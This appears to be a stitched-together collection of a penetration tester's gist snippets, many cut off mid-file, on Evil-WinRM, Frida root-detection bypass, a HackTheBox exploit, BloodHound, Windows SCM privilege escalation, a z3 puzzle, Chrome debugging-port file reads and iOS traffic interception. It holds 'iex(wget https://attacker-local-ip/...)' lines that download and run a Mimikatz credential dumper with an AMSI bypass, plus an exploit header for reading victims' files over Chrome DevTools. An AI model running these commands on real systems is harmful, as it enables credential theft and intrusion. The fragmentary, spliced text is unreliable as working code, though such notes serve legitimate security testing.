# @author Pichaya Morimoto (p.morimoto@sth.sh)
# gem install evil-winrm
# evil-winrm -u "${user}" -p "${pass}" -i "${ip}"
Evil-WinRM shell v3.4
Info: Establishing connection to remote endpoint
Error: An error of type OpenSSL::Digest::DigestError happened, message is Digest initialization failed: initialization error
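Why this happens, with an added check that is not part of the gist: Evil-WinRM authenticates with NTLM, and the NT hash is MD4 of the UTF-16LE password. OpenSSL 3 moved MD4 into its "legacy" provider, which is not loaded unless openssl.cnf activates it, so Ruby's `OpenSSL::Digest.new("MD4")` fails with exactly the "Digest initialization failed" message above. Ruby's openssl extension and CPython's hashlib both call the same libcrypto, so the Python probe below shows whether MD4 is reachable under the current `OPENSSL_CONF`; the configuration text it writes is the standard provider layout for activating default plus legacy (the file path is an assumption you supply).

```python
import hashlib

# Added example (not from the gist). Evil-WinRM authenticates with NTLM, and the
# NT hash is MD4. OpenSSL 3 keeps MD4 in the "legacy" provider, which is not
# loaded by default, so OpenSSL::Digest.new("MD4") in Ruby raises
# "Digest initialization failed". hashlib talks to the same libcrypto, so it is
# a quick way to check whether MD4 is reachable under the current OPENSSL_CONF.

# openssl.cnf fragment that activates the default AND the legacy provider.
# Point OPENSSL_CONF at a file containing this (or merge the sections into
# /etc/ssl/openssl.cnf) before running evil-winrm.
LEGACY_PROVIDER_CONF = """\
openssl_conf = openssl_init

[openssl_init]
providers = provider_sect

[provider_sect]
default = default_sect
legacy = legacy_sect

[default_sect]
activate = 1

[legacy_sect]
activate = 1
"""


def md4_available() -> bool:
    """True if libcrypto can construct an MD4 digest (legacy provider loaded)."""
    try:
        hashlib.new("md4", b"")
        return True
    except ValueError:  # "unsupported hash type md4"
        return False


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)); this is what NTLM auth needs from libcrypto."""
    return hashlib.new("md4", password.encode("utf-16-le")).hexdigest()


def write_legacy_conf(path: str) -> str:
    """Write the provider configuration to `path` (an assumed, caller-chosen location)."""
    with open(path, "w") as fh:
        fh.write(LEGACY_PROVIDER_CONF)
    return path


if __name__ == "__main__":
    print("MD4 available:", md4_available())
    if md4_available():
        print("NT hash of 'password':", nt_hash("password"))
    else:
        print("MD4 unavailable; write LEGACY_PROVIDER_CONF to a file and export OPENSSL_CONF=<that file>")
```

Run it once before and once after setting `OPENSSL_CONF`; when the second run prints the NT hash, Evil-WinRM's NTLM handshake will work too.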
// $ frida -l antiroot.js -U -f com.example.app --no-pause
// CHANGELOG by Pichaya Morimoto (p.morimoto@sth.sh):
// - I added extra whitelisted items to deal with the latest versions
//   of RootBeer/Cordova iRoot as of August 6, 2019
// - The original one just fucked up (killed itself) if Magisk was installed lol
// Credit & originally written by: https://codeshare.frida.re/@dzonerzy/fridantiroot/
// If this isn't working in the future, check the console logs, the rootbeer source, or libtool-checker.so
Java.perform(function() {
var RootPackages = ["com.noshufou.android.su", "com.noshufou.android.su.elite", "eu.chainfire.supersu",
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# Exploit for HackTheBox Clicker Machine (https://app.hackthebox.com/machines/564)
import requests
import random
import string
import urllib.parse
from base64 import b64encode, b64decode
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
# @author Pichaya Morimoto (p.morimoto@sth.sh)
Problem:
```bash
brew install proxychains-ng
proxychains4 ncat 1.2.3.4 # not working
```
There are public workarounds like https://benobi.one/posts/running_brew_on_m1_for_x86/
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# Compiled list of my common bloodhound-python problems & solutions
Bloodhound-python Error #0
You do not get data such as GPOs and permission-abuse edges.
You need to add the collection option -> -c All,LoggedOn
Bloodhound-python Error #1
raise NoNameservers(request=self.request, errors=self.errors)
dns.resolver.NoNameservers: All nameservers failed to answer the query _ldap._tcp.pdc._msdcs.DCHOSTNAME. IN SRV: Server 10.3.3.7 TCP port 53 answered SERVFAIL
@author LongCat (Pichaya Morimoto)
By default, only admin users have the right to manage the SCM,
but if you (mistakenly) grant a non-admin user the right to manage the SCM,
they will be able to perform tasks with admin / NT AUTHORITY\SYSTEM rights
(anyone who can create a service chooses the account it runs as, and that can be LocalSystem).
This is a known, documented design point, mentioned in:
1. Service Security and Access Rights
https://docs.microsoft.com/en-us/windows/desktop/Services/service-security-and-access-rights
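One way to check for this misconfiguration offline, as an added example that is not part of the gist: audit the SCM security descriptor (the SDDL string that `sc sdshow scmanager` prints on Windows) for allow-ACEs that give a non-admin principal SC_MANAGER_CREATE_SERVICE, WRITE_DAC, WRITE_OWNER or a generic right that implies them. The rights-to-mask table is taken from the documented SDDL codes and winsvc.h SC_MANAGER_* values; the two SDDL strings at the bottom are constructed samples (the "hardened" one follows the shape of a stock Windows 10 SCM DACL but is not claimed to be a verbatim dump), and `TRUSTED_SIDS` is an assumption you should adjust to your environment.

```python
import re

# Added example, not from the gist: audit an SCM security descriptor (the SDDL
# that `sc sdshow scmanager` prints) for ACEs that hand non-admin principals
# rights that amount to running code as SYSTEM.

# SDDL access-right codes -> masks. For the SCM object the low bits are the
# SC_MANAGER_* rights from winsvc.h; KA (0xF003F) equals SC_MANAGER_ALL_ACCESS.
RIGHTS = {
    "CC": 0x1,         # SC_MANAGER_CONNECT
    "DC": 0x2,         # SC_MANAGER_CREATE_SERVICE
    "LC": 0x4,         # SC_MANAGER_ENUMERATE_SERVICE
    "SW": 0x8,         # SC_MANAGER_LOCK
    "RP": 0x10,        # SC_MANAGER_QUERY_LOCK_STATUS
    "WP": 0x20,        # SC_MANAGER_MODIFY_BOOT_CONFIG
    "DT": 0x40, "LO": 0x80, "CR": 0x100,
    "SD": 0x10000,     # DELETE
    "RC": 0x20000,     # READ_CONTROL
    "WD": 0x40000,     # WRITE_DAC
    "WO": 0x80000,     # WRITE_OWNER
    "KA": 0xF003F, "KR": 0x20019, "KW": 0x20006, "KX": 0x20019,
    "FA": 0x1F01FF, "FR": 0x120089, "FW": 0x120116, "FX": 0x1200A0,
    "GA": 0x10000000, "GX": 0x20000000, "GW": 0x40000000, "GR": 0x80000000,
}
SC_MANAGER_CREATE_SERVICE = 0x2
WRITE_DAC, WRITE_OWNER = 0x40000, 0x80000
GENERIC_ALL, GENERIC_WRITE = 0x10000000, 0x40000000
# Any of these lets the holder create a SYSTEM service or grant itself the right to.
DANGEROUS = SC_MANAGER_CREATE_SERVICE | WRITE_DAC | WRITE_OWNER | GENERIC_ALL | GENERIC_WRITE

# Assumption: principals that legitimately hold full SCM access (BA = Builtin
# Administrators, SY = LocalSystem, plus their literal SID forms).
TRUSTED_SIDS = {"BA", "SY", "S-1-5-18", "S-1-5-32-544"}

ACE_RE = re.compile(r"\(([^)]*)\)")


def parse_rights(field: str) -> int:
    """Turn an SDDL rights field (two-letter codes or 0x-hex) into an access mask."""
    if field.lower().startswith("0x"):
        return int(field, 16)
    mask = 0
    for i in range(0, len(field), 2):
        mask |= RIGHTS[field[i:i + 2]]
    return mask


def parse_dacl(sddl: str):
    """Return [(ace_type, rights_mask, sid)] for every ACE in the DACL ("D:" part)."""
    dacl = sddl.split("D:", 1)[1].split("S:", 1)[0]   # drop owner/group and the SACL
    aces = []
    for body in ACE_RE.findall(dacl):
        parts = body.split(";")                        # type;flags;rights;objguid;inhguid;sid
        aces.append((parts[0], parse_rights(parts[2]), parts[5]))
    return aces


def find_scm_abuse(sddl: str):
    """SIDs outside TRUSTED_SIDS that an allow-ACE lets create services or rewrite the DACL."""
    return [
        (sid, hex(mask & DANGEROUS))
        for ace_type, mask, sid in parse_dacl(sddl)
        if ace_type == "A" and mask & DANGEROUS and sid not in TRUSTED_SIDS
    ]


# Constructed samples. HARDENED mirrors the shape of a stock SCM DACL; MISCONFIGURED
# is the same descriptor after someone "granted a non-admin the right to manage SCM"
# by giving Authenticated Users (AU) DC = SC_MANAGER_CREATE_SERVICE.
HARDENED = ("D:(A;;CC;;;AU)(A;;CCLCRPRC;;;IU)(A;;CCLCRPRC;;;SU)"
            "(A;;CCLCRPWPRC;;;SY)(A;;KA;;;BA)(A;;CC;;;AC)S:(AU;FA;KA;;;WD)")
MISCONFIGURED = HARDENED.replace("(A;;CC;;;AU)", "(A;;CCDCLCSWRPWPRC;;;AU)")

if __name__ == "__main__":
    print("hardened:     ", find_scm_abuse(HARDENED))
    print("misconfigured:", find_scm_abuse(MISCONFIGURED))
```

On a live host, paste the output of `sc sdshow scmanager` into `find_scm_abuse`; any SID it returns can register a service running as LocalSystem, which is the escalation the gist describes.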
# TLDR:
# iex(wget https://gist.github.com/pich4ya/e93abe76d97bd1cf67bfba8dce9c0093/raw/e32760420ae642123599b6c9c2fddde2ecaf7a2b/Invoke-OneShot-Mimikatz.ps1 -UseBasicParsing)
#
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# One Shot for M1m1katz PowerShell Dump All Creds with AMSI Bypass 2022 Edition
# (Tested and worked on Windows 10 x64 patched 2022-03-26)
#
# Usage:
# 1. You need a local admin user's PowerShell running at Medium Mandatory Level (check with whoami /all)
# 2. iex(wget https://attacker-local-ip/Invoke-OneShot-Mimikatz.ps1 -UseBasicParsing)
# A numeric lock has a 3 digit key
# "682" - One number is correct and well placed
# "614" - One number is correct but wrongly placed
# "206" - Two numbers are correct but wrongly placed
# "738" - Nothing is correct
# "780" - One number is correct but wrongly placed
from z3 import *
# Create three integer variables for the lock digits
#!/usr/bin/env python
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# Ported from https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/chrome_debugger.rb
# pip install requests websocket-client python-socks
# This exploit code reads arbitrary files from a victim machine that runs
# chrome/chromium with --remote-debugging-port=9222, which is common for test-automation
# tooling during software testing. The debugging port has no authentication.
import requests
import json
import urllib3
import websocket
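The DevTools-protocol exchange such a script relies on, as an added example that is not part of the gist: ask Chrome to open `file://<path>` in a new target via `/json/new`, connect to the target's `webSocketDebuggerUrl`, and send a `Runtime.evaluate` command that returns the rendered text. The HTTP and websocket calls are abstracted behind a transport object so the block runs offline against the constructed `FakeChrome` below; with a real target you would back the same two methods with an HTTP client and a websocket client. `FakeChrome`, its single known file and the way it answers for an unknown file are all constructed stand-ins, not Chrome behaviour.

```python
import json
from urllib.parse import quote

# Added example, not from the gist: the Chrome DevTools Protocol (CDP) exchange
# behind "read a file through --remote-debugging-port", written against an
# abstract transport so it can run offline against FakeChrome (constructed).


def new_target_request(host: str, port: int, url: str):
    """HTTP request that opens `url` in a new tab and returns the target's JSON
    description, including webSocketDebuggerUrl.
    Chrome 91+ requires PUT for /json/new; older builds accepted GET."""
    return "PUT", f"http://{host}:{port}/json/new?{quote(url, safe=':/')}"


def evaluate_message(msg_id: int, expression: str) -> str:
    """Runtime.evaluate command; returnByValue makes the reply carry a plain value."""
    return json.dumps({"id": msg_id, "method": "Runtime.evaluate",
                       "params": {"expression": expression, "returnByValue": True}})


def evaluate_result(raw: str, msg_id: int):
    """String value from a Runtime.evaluate reply, or None when the message is
    an event / a reply to another command / a non-string result."""
    msg = json.loads(raw)
    if msg.get("id") != msg_id:
        return None
    if "error" in msg:
        raise RuntimeError(f"CDP error: {msg['error'].get('message')}")
    result = msg.get("result", {}).get("result", {})
    return result.get("value") if result.get("type") == "string" else None


def read_file(transport, host: str, port: int, path: str, msg_id: int = 1):
    """Open file://<path> in a new tab and return its rendered text."""
    method, url = new_target_request(host, port, "file://" + path)
    target = json.loads(transport.http(method, url))
    ws = transport.websocket(target["webSocketDebuggerUrl"])
    ws.send(evaluate_message(msg_id, "document.documentElement.outerText"))
    return evaluate_result(ws.recv(), msg_id)


class FakeChrome:
    """Constructed stand-in for a browser started with --remote-debugging-port.
    It serves one file; for anything else it answers with an undefined result
    (a stand-in choice, not what a real browser does for a missing file)."""
    FILES = {"/etc/hostname": "victim-build-agent\n"}   # constructed content

    def __init__(self):
        self.opened = None

    def http(self, method: str, url: str) -> str:
        assert method == "PUT"
        self.opened = url.split("/json/new?", 1)[1]
        return json.dumps({"id": "ABC",
                           "webSocketDebuggerUrl": "ws://127.0.0.1:9222/devtools/page/ABC"})

    def websocket(self, ws_url: str):
        path = self.opened[len("file://"):] if self.opened.startswith("file://") else None
        return _FakeSocket(self.FILES.get(path))


class _FakeSocket:
    def __init__(self, content):
        self.content, self.last_id = content, None

    def send(self, raw: str):
        self.last_id = json.loads(raw)["id"]

    def recv(self) -> str:
        if self.content is None:
            return json.dumps({"id": self.last_id, "result": {"result": {"type": "undefined"}}})
        return json.dumps({"id": self.last_id,
                           "result": {"result": {"type": "string", "value": self.content}}})


if __name__ == "__main__":
    print(read_file(FakeChrome(), "127.0.0.1", 9222, "/etc/hostname"))
```

The mitigation follows from the exchange: there is no credential anywhere in it, so a debugging port reachable from another host (or another user on the same host) is a file-read and session-theft primitive; bind it to loopback and keep it off in anything that is not a throwaway test runner.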
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# How to capture Xamarin and Flutter HTTPS API traffic using iPhone and MBP
# How to MITM the Web API of an iOS app via macOS -> Burp Suite, set up as a proxy for proxy-unaware clients
# (e.g. Xamarin or Flutter apps that do not go through the system proxy and do not use the default cert store on the iPhone)
# For a normal app that already uses the system proxy you do not need this; just set the proxy as usual.
1. Connect the (jailbroken) iPhone to the MBP over USB, then use iproxy and an ssh reverse tunnel (-R) so that local port 8080 on the iPhone is forwarded to local port 8080 on the MBP
$ brew install usbmuxd
$ iproxy 2222 22 & disown && ssh -R 8080:localhost:8080 -p 2222 root@127.0.0.1 -N -f